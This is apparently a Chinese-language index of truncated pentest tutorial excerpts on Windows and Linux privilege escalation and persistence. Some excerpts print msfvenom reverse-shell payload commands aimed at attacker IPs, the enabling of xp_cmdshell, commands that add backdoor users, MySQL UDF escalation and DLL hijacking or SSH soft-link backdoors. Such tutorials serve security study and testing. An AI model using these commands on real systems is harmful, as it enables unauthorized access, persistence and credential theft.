提权背景 权限提升意味着用户获得不允许他使用的权限。比如从一个普通用户，通过“手段”让自己变为管理员用户，也可以理解为利用操作系统或软件应用程序中的错误，设计缺陷或配置错误来获得对更高访问权限的行为。 为什么需要提权 权限的提升可以让人“知道”更多的事情，特别是攻击者，一旦提权成功后果不堪设想。攻击者在提权主要有以下几点的考虑，分别是： 读取/写入敏感文件 “隧道”权限维持 插入恶意BackDoor …. 基于...

1、 windows 补丁审计工具使用 在终端下可以使用命令systeminfo 来查看系统的一些补丁信息   http://www.demo1.com/asp.aspx 补丁检测Windows-Exploit-Suggester https://github.com/GDSSecurity/Windows-Exploit-Suggester 下载工具 git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git 用法 ...

1、简介   服务器 （vps）上安装了iis安全狗 服务器安全狗通常这种服务器都是比较难提权 不仅是漏洞补丁修复得差不多，waf 对于常规的提权方法也是拦截得较多。 aspx大马 被查杀 拦截 不能访问所以要用内部过waf的 暗月过狗刀 基本过一切waf 中国菜刀 一句话 客户端 菜刀发送的包里面包含eval特征会被waf拦截，服务端一句话一般都会拦截。除了做了一些变异。 现在的测试环境 环境是 Microsoft Windows Web Server 2008 R2 WEB环境 php asp aspx ...

0x001 linux提权描述 大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件。特权升级意味着用户获得他们无权获得的特权。这些特权可用于删除文件，查看私人信息或安装不需要的程序，例如病毒。通常，当系统存在允许绕过安全性的错误或对使用方法的设计假设存在缺陷时，通常会发生这种情况。 特权提升是利用操作系统或软件应用程序中的错误，设计缺陷等等来获得对通常受到应用程序或用户保护的资源的更高访问权限的行为。结果是，具有比应用程序开发人员或系统管理员想要的特权更多的应用程序可以执行未经授权的操作。 特权升级有两种类型：...

前言 上篇介绍了如何在有源码的情况下，通过 argv[] 及 prctl 对进程名及参数进行修改，整篇围绕/proc/pid/目录和 ps、top 命令进行分析，做到了初步隐藏，即修改了 /proc/pid/stat 、/proc/pid/status 、/proc/pid/cmdline 这些文件的信息，使得 ps、top 命令显示了虚假的进程信息；但是还存在一些**缺点**： 1.ps、top 命令还是显示了真实的 pid 2./proc/pid 目录依然存在，/proc/pid/exe 及/proc/pid/cwd 文件依然暴露了可执行文件的...

一、操作目的和应用场景 本文档介绍在CentOS 7系统中利用带有suid权限的程序提权从而获取root shell的方法。 首先简单介绍suid的概念： Linux进程在运行的时候有以下三个UID： Real UID：执行该进程的用户的UID。Real UID只用于标识用户，不用于权限检查。 Effective UID（EUID）：进程执行时生效的UID。在对访问目标进行操作时，系统会检查EUID是否有权限。一般情况下，Real UID与EUID相同，但在运行设置了SUID权限的程序时，进程的EUID会被设置为程序文件属主的UID。 Saved UID：在高权限用户降权后...

本文介绍了如何滥用Windows上特权进程执行文件操作来实现本地特权升级（用户到管理员/系统），同时介绍了利用这些类型的错误的现有技术以及漏洞利用工具。 特权文件操作错误 高权限运行的进程会和所有进程一样对操作系统中的文件进行操作。但是当一个高权限的进程在没有足够的安全措施的情况下访问用户控制的文件或目录时，就有可能成为一个安全漏洞，因为恶意程序有可能滥用该特权进程执行的操作，做一些不该做的事情。对用户控制的资源进行特权访问很多时候都可能造成安全问题，文件只是其中一个部分。 人们熟知的例子包括修改用户可写服务可执行文件和DLL种植。如果你对特权服务将执行的文件有写权限，或...

Windows 内核漏洞提权 参考： windows-kernel-exploits 微软安全公告 渗透测试小技巧一：寻找EXP Windows 内核漏洞的关键是目标系统没有安装补丁，如何查询目标系统是否安装补丁？ 1 2 3 4 5 #查看本地系统补丁 systeminfo |findstr "KB" wmic qfe get Caption,Description,HotFixID,InstalledOn #另外两种远程查询的方式需要结合其他远程执行方式，例如 wmi...

提权技巧 1.cmd拒绝访问就自己上传一个cmd.exe，自己上传的cmd是不限制后缀的，还可以是cmd.com cmd.txt cmd.rar等 2.net user不能执行有时候是net.exe被删除了，可以先试试net1，不行就自己上传一个net.exe 3.cmd执行exp没回显的解决方法：com路径那里输入exp路径C:\RECYCLER\pr.exe，命令那里清空(包括/c )输入net user jianmei daxia /add 4.有时候因为监控而添加用户失败，试试上传抓取hash的工具，如PwDump7.exe，得到hash之后可以进...

0x00:前言     持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用. Linux 0x01:SSH 一、ssh软连接     SSH软连接后门的原理 1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用 2、将sshd文件软连接名称设置为su,这样应用在启动...

不让我注入进程撒？加服务启动你拦截我撒？来  我用另类方法”注入”加入自启动? 众所周知,某0卫士对启动这一块做的比较严格。以往来说 大家都喜欢注册表启动，后来注册表被杀的太厉害。结果GG了。然后衍生出来服务启动?不过好景不长,服务启动也被和谐…..有反驳的可以附上你代码? (有点空手套EXP的感觉)  当然  也有服务能启动的，前提是你找到一个靠谱的白名单程序…抠鼻..我找到了…就是…不告诉你 以上是背景….目前来说  比较靠谱的一种做法是进程注入。进程注入多用于隐匿自身 以及做一些其他不可描述的事情。但…..各位程序大佬清楚 大多的 传统的...

DLL注入是一种允许攻击者在另一个进程的地址空间的上下文中运行任意代码的技术。如果进程中以过多的权限运行，那么可以会被攻击者加以利用，以便以DLL文件的形式执行恶意代码以提升权限。 手动注入 通过Metasploit的msfvenom创建DLL，该文件可以生成包含特定有效内容的DLL文件。应该注意的是，如果DLL被注入的进程是64位，那么应该使用64位有效负载。 Msfvenom - DLL生成 下一步是设置metasploit监听，以便在将恶意DLL注入进程后接受连接。 Metasploit监听配置 有许多可以执行DL...

1、 windows 补丁审计工具使用   在终端下可以使用命令systeminfo 来查看系统的一些补丁信息   http://www.demo1.com/asp.aspx 补丁检测Windows-Exploit-Suggester https://github.com/GDSSecurity/Windows-Exploit-Suggester 下载工具 git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git ...

INUX UDF提权   Linux 一般情况下的是没有权限导出 udf 到 mysql 的插件目录的，除非有特殊的情况 ， 所以今天这个教程可能对我们 linux 提权是没有起到任何有用的方面。看看就好别入戏太深。 Plugin 一般是不可以写的就算是 mysql root 权限 一般都是不行的 知道这种方法就好 得到mysql的帐号和密码 在mysql里执行 以下语句 获取插件目录 show variables like "%plugin%" 这个目录存在的条件是可写 。...

1、简介 Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。 2、使用metasploit linux提权 生成攻击载荷 msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.134 LPORT=12345 -f raw&n...

1、 简介     FileZilla 是一个ftp服务器， 假如配置不严的，读取xml密码 可以执行一些简答的命令 默认安装目录 C:\Program Files\FileZilla Server\   2、 提权     FileZilla Server Interface.xml      <FileZillaServer>   &nb...

这篇是接着上篇内容所说。 Zend_DLL_Hijacking.exe执行远控 msfconsole 生成反弹shell 生成攻击载荷 msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.106  lport=12345 -f exe >/var/www/html/s.exe 本地监听 use exploit/multi/handler set payload w...

1、简介   在php里面有一个扩展是zend 这个是用解析 php zend脚本加密文件。 如果服务器安装了zend 如果ZendExtensionManager.dll权限可以修改，那就可以用其他dl替换这dll文件。 查找ZendExtensionManager.dll C:\ZkeysSoft\Zend\ZendOptimizer-3.3.3\lib               &...

1、简介   lpk劫持   在window2003 或 windowxp中 如果同一个目录中 存在 exe和 lpk.dll 每当exe执行的时候就会被劫持。利用这个特性 可以把lpk提权的文件放到权限较高的程序 ，当exe运行时，lpk.dl就可以进行提权。   2、T00ls Lpk Sethc v4   这个工具是生成lpk dll文件的工具，利用这个工具就可以生成后门文件 劫持exe 替换 setch 实现提权   3、过程 &nb...

1、简介 如果网站里面使用的数据库是sqlserver 那么如果找到sa的密码，利用提权脚本，执行命令，但是不一定的系统权限，还要看管理员开始安装sqlserver的权限设置。 2、查找帐号和密码 web.config config.asp conn.aspx database.aspx 3、开启xp_cmdshell Exec master.dbo.xp_cmdshell 'net user' Exec sp_configure'show advanced opti...

1、 简介 在mysql 可以使用自定义函数进行提权，udf = userdefined function 用户自定义函数 对于自定义的函数 在mysql5.1版本以后就需要放在插件插件目录/lib/plugin ,文件后缀微 dll，c语言编写   2、 插件目录   可以使用语句查询plugin插件目录 show variableslike "%plugin%" D:\phpStudy\MySQL\lib\plugin\   3、 使用ud...

1、简介 在winserver2008 r2 中 服务器默认是支持aspx的。所以默认都是可以执行一些命令。 如果没有进行补丁修复可以利用一些溢出提权工具,进行提权。 2、CVE-2014-4113-Exploit 这个版本的提权工具 可以对winserver2008 的系统进行溢出提权   3、实战   http://www.demo1.com/asp.aspx   systeminfo 这个命令查看系统信息的 主机名:&...

1、简介 aspx程序比asp的权限高，默认是可以执行cmd命令的。如果在asp不能执行命令的时候，如果服务器支持aspx 则上传aspx 程序到 网站上进行提权.   2、程序权限的对比 在iis里面 权限依次的大小对比 aspx->php=>asp aspx默认能执行终端命令 3、进行提权 http://www.demoasp.com/asp.aspx 密码admin 权限更大的时候还可以看到iis所有网站的帐号和密码。 ...

1、简介 window 服务器 常用的是win2003 win2008 win2012 在渗透测试中 ，我们获取的权限是iis_user用户组 ，要更高的权限就需要把当前的用 户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中，扩大 范围测试。   2、程序权限的对比   在iis里面 权限依次的大小对比 aspx->php=>asp aspx默认能执行终端命令 php和asp 如果不能执行命令，在组件没有删除的情况下，可以...

Cron Jobs 计划任务通过 /etc/crontab 文件，可以设定系统定期执行的任务。 crontab 文件只能是root权限 进行编辑 我们得到一个非root权限的远程登录用户的时候 查看/etc/crontab 内容文件   发现存在 每两分钟执行一次文件 找到 /tmp/cleanup.py   cat /tmp/cleanup.py   #!/usr/bin/env python imp...